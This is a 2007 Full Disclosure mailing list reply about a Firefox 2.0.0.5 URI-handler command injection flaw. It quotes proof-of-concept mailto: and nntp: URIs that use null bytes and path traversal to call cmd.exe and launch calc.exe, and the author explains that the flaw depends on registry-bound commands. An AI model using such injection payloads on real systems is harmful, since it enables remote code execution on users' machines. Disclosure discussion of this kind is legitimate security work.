Full Disclosure mailing list archives
Re: FIREFOX 2.0.0.5 new vulnerability
From: "Nate McFeters" <nate.mcfeters () gmail com>
Date: Wed, 25 Jul 2007 08:45:28 -0400
Check out our blog on xs-sniper.com. There's more info there. This flaw does somewhat depend upon what you have installed, as is referenced on our blog page. Keep in mind that the URI's are tied to commands thru the registry, and that those commands are where the command injections go. If you have a different command from what we have, then of course there's the chance it doesn't work. Thanks, Nate On 7/25/07, Mesut EREN <meren () basakkiremit com tr> wrote:
Hi all, FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But don't work is code. Example code is mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat Where i missing? Mesut EREN BAŞAK ÇATI & CEPHE SİSTEMLERİ Bilgi İşlem Sorumlusu MCSA:S,MCSE:S,CEH,CCNA meren () basakkiremit com tr _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- FIREFOX 2.0.0.5 new vulnerability Mesut EREN (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability Valdis . Kletnieks (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability pdp (architect) (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability Nate McFeters (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability wac (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability Nate McFeters (Jul 25)
- Re: FIREFOX 2.0.0.5 new vulnerability wac (Jul 27)
- Re: FIREFOX 2.0.0.5 new vulnerability Nate McFeters (Jul 27)
- Re: FIREFOX 2.0.0.5 new vulnerability Joe Barr (Jul 28)
- Re: FIREFOX 2.0.0.5 new vulnerability Nate McFeters (Jul 25)